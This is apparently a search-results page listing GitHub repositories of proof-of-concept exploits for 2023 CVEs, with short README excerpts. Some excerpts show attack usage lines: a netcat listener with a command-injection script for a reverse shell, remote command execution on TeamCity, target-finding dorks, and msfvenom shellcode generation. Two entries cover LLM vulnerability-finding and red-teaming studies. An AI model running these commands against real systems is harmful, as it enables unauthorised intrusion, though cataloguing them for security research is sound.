127501 matches found
-CVE-2023-30845
CVE-2023-30845 Este es un script que automatiza CVE-2023-30845 en múltiples subdominios Métodos de uso: CLONAR REPOSITORIO| DAR PERMISO AL ARCHIVO| EJECUTAR EL ARCHIVO ---|---|--- https://github.com/himori123/-CVE-2023-30845.git| chmod +x CVE-2023-30845.sh| ./CVE-2023-30845.sh...
CVE-2023-42793
CVE-2023-42793 TeamCity CVE-2023-42793 RCE Remote Code Execution rce.py Inspired by - https://www.prio-n.com/blog/cve-2023-42793-attacking-defending-JetBrains-TeamCity python3 rce.py --url teamcity.runner.htb --command whoami exploit.py This script is copy of...
CVE-2023-6019
Ray OS Command Injection RCEUnauthorized Usage: 1. nc -lvnp 4444 2. python3 cve-2023-6019.py -t 192.168.1.13 -p 80 -L 192.168.1.14 -P 80...
CVE-2023-4450-Attack
CVE-2023-4450-Attack An automated tool for attacking the CVE-2023-4450 vulnerability in JimuReport Introduction This tool is only for security testing, do not use it for illegal purposes! Usage root@kitploit: java -jar CVE-2023-4450-Attack.jar Provides three functions: command execution,...
Joomla-CVE-2023-23752
Joomla-CVE-2023-23752 This Python implementation serves an educational purpose by illustrating the exploitation of CVE-2023-23752. The code offers insight into how the vulnerability can be exploited. Table of Contents About Installation Usage Contributing Vulnerable Environment Deployment Credits...
CVE-2023-51385
This repository does not have a README...
claude_opus_cve_2023_0266
Demostración de que Claude 3 Opus no entiende CVE-2023-0266 y no lo encuentra Demo 1. Incluso si se le dice dónde está el error, Opus no lo encuentra y alucina la presencia de adquisiciones de bloqueo Demo 2. La "ingeniería de prompts" también conocido como decirle al LLM exactamente cómo encontr...
CVE-2023-1671-POC
Dork fofa title="Sophos Web Appliance" || app="Sophos-Web-Appliance" && title!="Sophos Web Appliance:错误请求" ZoomEye title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request" Shodan title:"Sophos Web Appliance" Uso root@kitploit: python...
CVE-2023-0386-libs
Install compilation environment root@kitploit: sudo apt install -y gcc libfuse-dev pkg-config Compile exploit root@kitploit: gcc -Wall CVE-2023-0386.c pkg-config fuse --cflags --libs -DFILEOFFSETBITS=64 -o CVE-2023-0386-exp -static -lfuse Generate shellcode root@kitploit: msfvenom -p linux/x86/ex...
CVE-2023-36025
CVE-2023-36025 Simple test for CVE-2023-36025, based on PoC demoed in https://twitter.com/wdormann/status/1725148437115473947 This code is not meant to run out of the box - the ZIP file must be hosted on a server you own, and be accesible to the victim machine on a file:// URL...
WinRAR-CVE-2023-38831
WinRAR-CVE-2023-38831 This Metasploit module exploits a vulnerability in WinRAR 6.22 CVE-2023-38831. When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution. It is not pretty, but works. 🤷🏻 Alexander Hagenah @xaitax References...
CVE-2023-6241-Pixel7_Adaptation
CVE-2023-6241 para Google Pixel 7 Este repositorio ilustrará cómo adaptar el exploit publicado por securitylab en su repositorio de GitHub que funciona para Google Pixel 8 para un Google Pixel 7. Antes de comenzar la modificación del exploit, se asumió, basándose en el artículo asociado a...
cve-2023-22515-exp
cve-2023-22515-exp Python exploit script for cve-2023-22515 Arguments: root@kitploit: -h, --help show this help message and exit -H HOST, --host HOST Specify the URL -U USERNAME, --username USERNAME Specify the username -PW PASSWORD, --password PASSWORD Specify the password -E EMAIL, --email EMAI...
CVE-2023-31541
Este repositorio no tiene un README...
CVE-2023-29357
Este repositorio no tiene un README...
kur
kur A code simply offers the ability to kernel-mode read / write memory from user-mode using vulnerable signed driver. It's simply utilizing MmCopyVirtualMemory, which is undocumented yet one of the most common API, in kernel mode so you can read / write any user-mode memory without having to wor...
gemini-2.5-pro-nf-tables-red-teaming
Gemini 2.5 Pro nftables Red Teaming Case Study CVE-2023-32233 LLM Safety Research | Responsible Disclosure | AI Alignment Evaluation Researcher : Niranj R Mahaswar Destawell Google AI Vulnerability Reward Program : 889286 — Out of Scope Summary This repository documents a comparative LLM red...
SOC227-Microsoft-SharePoint-Server-Elevation-of-Privilege-Possible-CVE-2023-29357-Exploitation
SOC227 - Microsoft SharePoint Server Elevation of Privilege CVE-2023-29357 Exploitation CVE-2023-29357 is a critical privilege escalation vulnerability that, when combined with other vulnerabilities, could potentially lead to remote code execution. The CVSS score for this vulnerability is 9.8...
Metasploit-Exploits-CVE-2023-6710
CVE-2023-6710 Exploit POC Explore the depths of CVE-2023-6710 with metasploit and our comprehensive Proof of Concept PoC. This CVE, identified as a potential security vulnerability, has been meticulously examined to demonstrate its impact and provide a hands-on understanding of the associated...
cve-2023-41993-test
PoC original de po6ix Post-explotación que copié de los exploits de expresiones regulares de nikiasb y Linus Henze, el paper de Phrack/cadena de exploits de Pwn2Own 2018 de 5aelo, la serie de blog/YouTube de LiveOverflow...